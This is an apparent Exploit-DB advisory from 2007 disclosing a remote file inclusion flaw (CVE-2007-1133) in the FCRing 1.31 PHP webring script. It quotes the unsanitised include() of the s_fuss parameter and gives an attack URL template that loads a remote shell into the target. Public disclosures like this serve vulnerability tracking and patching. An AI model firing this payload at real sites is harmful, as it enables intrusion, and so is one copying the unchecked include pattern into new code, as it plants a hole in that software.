FCRing <= 1.31 fcring.php s_fuss Remote File Include Vulnerability

2007-02-23T00:00:00
ID EDB-ID:3365
Type exploitdb
Reporter kezzap66345
Modified 2007-02-23T00:00:00

Description

FCRing <= 1.31 (fcring.php s_fuss) Remote File Include Vulnerability. CVE-2007-1133. Webapps exploit for php platform

                                        
                                            FCRing 1.3 Webringskript

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=fcring&title=FCRing%201.3
*****************
ERROR:


 if($s_fuss != "")
  include($s_fuss);      &lt;&lt;&lt; rfi coded


**************************************************************************************
RFI:

http://SITE.com/path/fcring.php?s_fuss=[SHELL]


**************************************************************************************
kezzap66345[at]hotmail[dot]com

******thanx=x0r0n*str0ke*shika********************************************************

# milw0rm.com [2007-02-23]